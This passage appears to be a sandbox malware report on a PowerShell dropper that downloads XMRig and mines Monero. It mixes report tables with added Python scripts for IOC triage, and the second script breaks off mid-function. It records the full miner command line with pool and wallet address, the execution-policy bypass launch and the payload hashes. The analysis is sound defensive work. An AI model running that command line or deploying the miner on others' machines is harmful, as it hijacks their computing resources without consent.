N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

memory/2856-0-0x00007FFA8F233000-0x00007FFA8F235000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5slrnlro.44c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2856-6-0x0000017F68D40000-0x0000017F68D62000-memory.dmp

memory/2856-11-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-12-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-14-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/2856-16-0x0000017F68D80000-0x0000017F68D8A000-memory.dmp

memory/2856-15-0x0000017F697A0000-0x0000017F697B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4908-47-0x0000015869A20000-0x0000015869A40000-memory.dmp

memory/4908-48-0x000001586B360000-0x000001586B380000-memory.dmp

memory/4908-49-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/2856-50-0x00007FFA8F233000-0x00007FFA8F235000-memory.dmp

memory/4908-53-0x000001586B3A0000-0x000001586B3C0000-memory.dmp

memory/4908-52-0x000001586B380000-0x000001586B3A0000-memory.dmp

memory/2856-51-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/4908-54-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/2856-55-0x00007FFA8F230000-0x00007FFA8FCF1000-memory.dmp

memory/4908-56-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-57-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-59-0x000001586B3A0000-0x000001586B3C0000-memory.dmp

memory/4908-58-0x000001586B380000-0x000001586B3A0000-memory.dmp

memory/4908-60-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-61-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-62-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-63-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-64-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-65-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-66-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-67-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-68-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-69-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-70-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-71-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-72-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-73-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-74-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-75-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-76-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-77-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-78-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-79-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-80-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-81-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-82-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-83-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-84-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-85-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-86-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-87-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-88-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-89-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-90-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-91-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-92-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-93-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-94-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-95-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-96-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-97-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-98-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-99-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-100-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-101-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-102-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-103-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-104-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-105-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-106-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-107-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-108-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-109-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-110-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-111-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-112-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-113-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-114-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-115-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-116-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-117-0x00007FF6049F0000-0x00007FF605623000-memory.dmp

memory/4908-118-0x00007FF6049F0000-0x00007FF605623000-memory.dmp
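Two kinds of file appear in the Files sections of these runs. The __PSScriptPolicyTest_<random>.<random>.ps1 file is written to %TEMP% by powershell.exe itself at start-up to learn whether AppLocker/WDAC script enforcement applies; it is a side effect of launching PowerShell, not something the .ps1 dropped, and only xmrig.exe is the payload. Worth noticing: in behavioral17 the probe's four hashes are exactly the MD5, SHA-1, SHA-256 and SHA-512 of the one-byte content "1", whereas behavioral20, 21 and 28 report a different, shared hash set for that file. The script below is an added example, not report output: it parses a Files section into records, classifies each by path, and tests a reported hash set against constructed content hypotheses, requiring every listed digest to agree before accepting one. The entries are copied from behavioral17 (memory dumps abridged to three) and from the behavioral21 probe entry.

```python
"""Classify sandbox Files entries and test what a reported hash set encodes (added example)."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

BEHAVIORAL17_FILES = r"""
memory/1640-3-0x00007FFDDF723000-0x00007FFDDF724000-memory.dmp
memory/1640-5-0x0000026AC1EE0000-0x0000026AC1F02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_45skuy1a.drk.ps1
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
memory/1640-25-0x00007FFDDF720000-0x00007FFDE010C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
"""

BEHAVIORAL21_PROBE = r"""
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5slrnlro.44c.ps1
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
"""

_HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
_PS_PROBE = re.compile(r"__PSScriptPolicyTest_[A-Za-z0-9]+\.[A-Za-z0-9]+\.ps1$")
_ALGOS = {"MD5": hashlib.md5, "SHA1": hashlib.sha1,
          "SHA256": hashlib.sha256, "SHA512": hashlib.sha512}
# Constructed content hypotheses to test against a reported hash set.
CANDIDATE_CONTENTS = {"single ASCII digit '1'": b"1", "empty file": b""}


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def kind(self) -> str:
        if _PS_PROBE.search(self.path):
            return "powershell-policy-probe"   # written by powershell.exe, not by the script
        if self.path.lower().endswith(".exe"):
            return "dropped-executable"
        return "other"


def parse_files_section(text: str):
    """Return (file records, number of memory-dump entries)."""
    files, dumps, cur = [], 0, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("memory/"):
            dumps += 1
            cur = None                 # never attach a hash line across a dump entry
            continue
        m = _HASH_LINE.match(line)
        if m and cur is not None:
            cur.hashes[m.group(1)] = m.group(2).lower()
            continue
        cur = DroppedFile(path=line)
        files.append(cur)
    return files, dumps


def match_content(f: DroppedFile) -> Optional[str]:
    """Label of the candidate whose digests agree with every hash the report lists."""
    for label, data in CANDIDATE_CONTENTS.items():
        digests = {name: fn(data).hexdigest() for name, fn in _ALGOS.items()}
        if f.hashes and all(digests[a] == h for a, h in f.hashes.items()):
            return label
    return None


if __name__ == "__main__":
    for text in (BEHAVIORAL17_FILES, BEHAVIORAL21_PROBE):
        files, dumps = parse_files_section(text)
        print(f"{dumps} memory dumps")
        for f in files:
            print(f"{f.kind:25} {f.path}  content={match_content(f) or 'not recovered'}")
```

The practical use is hunting: the probe file's hashes should never be added to a blocklist (they describe PowerShell's own behaviour), while the xmrig.exe SHA-256 is stable across all four runs and is the value to search for on endpoints.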

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:32

Platform

win11-20240419-en

Max time kernel

1798s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all fields N/A (the sandbox recorded no per-hit description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1612-0-0x00007FF864F03000-0x00007FF864F05000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bswagwlb.piw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1612-9-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-10-0x000001A7AD4F0000-0x000001A7AD512000-memory.dmp

memory/1612-11-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-12-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/1612-14-0x000001A7C5C50000-0x000001A7C5C62000-memory.dmp

memory/1612-15-0x000001A7C5C40000-0x000001A7C5C4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4868-46-0x00000167C2660000-0x00000167C2680000-memory.dmp

memory/4868-47-0x00000167C26A0000-0x00000167C26C0000-memory.dmp

memory/4868-48-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/1612-49-0x00007FF864F03000-0x00007FF864F05000-memory.dmp

memory/1612-50-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/4868-52-0x00000167C26C0000-0x00000167C26E0000-memory.dmp

memory/4868-51-0x00000167C26E0000-0x00000167C2700000-memory.dmp

memory/4868-53-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/1612-54-0x00007FF864F00000-0x00007FF8659C2000-memory.dmp

memory/4868-55-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-58-0x00000167C26C0000-0x00000167C26E0000-memory.dmp

memory/4868-57-0x00000167C26E0000-0x00000167C2700000-memory.dmp

memory/4868-56-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-59-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-60-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-61-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-62-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-63-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-64-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-65-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-66-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-67-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-68-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-69-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-70-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-71-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-72-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-73-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-74-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-75-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-76-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-77-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-78-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-79-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-80-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-81-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-82-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-83-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-84-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-85-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-86-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-87-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-88-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-89-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-90-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-91-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-92-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-93-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-94-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-95-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-96-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-97-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-98-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-99-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-100-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-101-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-102-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-103-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-104-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-105-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-106-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-107-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-108-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-109-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-110-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-111-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-112-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-113-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-114-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-115-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-116-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

memory/4868-117-0x00007FF6DE6A0000-0x00007FF6DF2D3000-memory.dmp

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-25 15:43

Reported

2024-05-25 16:41

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 hits, all fields N/A (the sandbox recorded no per-hit description, indicator, process or target for this signature)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
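The Network tables of behavioral17, 20, 21 and 28 mix three things: resolver queries to 8.8.8.8:53, reverse (in-addr.arpa) lookups the OS performs for peers it has already contacted, and the TCP connections that matter (the GitHub download of the release archive, the pool, and in behavioral17 one connection to 52.111.236.23:443 with no domain recorded). The triage below is an added example, not report output: it parses the rows, drops PTR lookups, keeps forward lookups and TCP endpoints, separates unattributed connections, and merges several detonations so that a domain that resolved to different IPs across runs (objects.githubusercontent.com here) shows both. The rows are copied from behavioral17 and behavioral28 and from the bing.com rows of behavioral21; the BENIGN_NOISE allowlist is an analyst assumption about Windows background traffic in the sandbox, not something the report states.

```python
"""Triage sandbox Network tables into forward lookups and TCP IOCs (added example)."""
from dataclasses import dataclass
from typing import Optional

SAMPLES = {
    "behavioral17": """
Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 104.116.69.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
""",
    "behavioral21 (bing rows only)": """
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
""",
    "behavioral28": """
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
""",
}

# Assumption: Windows background traffic of the sandbox image, not sample behaviour.
BENIGN_NOISE = {"g.bing.com", "www.bing.com"}


@dataclass(frozen=True)
class NetRow:
    country: str
    ip: str
    port: int
    domain: Optional[str]
    proto: str


@dataclass
class Triage:
    forward_lookups: set      # names queried at the resolver, PTR lookups excluded
    suspicious_tcp: set       # (ip, port, domain-or-None) not on the allowlist
    unattributed: set         # TCP connections the report lists without a domain


def parse_rows(table: str) -> list[NetRow]:
    rows = []
    for line in table.strip().splitlines():
        toks = line.split()
        if len(toks) < 3 or toks[0] == "Country":
            continue                          # header or malformed line
        ip, _, port = toks[1].rpartition(":")
        domain = toks[2] if len(toks) == 4 else None
        rows.append(NetRow(toks[0], ip, int(port), domain, toks[-1]))
    return rows


def triage(rows: list[NetRow], noise=BENIGN_NOISE) -> Triage:
    lookups = {r.domain for r in rows
               if r.proto == "udp" and r.port == 53 and r.domain
               and not r.domain.endswith(".in-addr.arpa")}
    tcp = {(r.ip, r.port, r.domain) for r in rows if r.proto == "tcp"}
    return Triage(
        forward_lookups=lookups,
        suspicious_tcp={t for t in tcp if t[2] not in noise},
        unattributed={t for t in tcp if t[2] is None},
    )


def ioc_by_name(triages: list[Triage]) -> dict[str, set[str]]:
    """Merge detonations: domain (or bare IP when none was recorded) -> set of ip:port."""
    out: dict[str, set[str]] = {}
    for t in triages:
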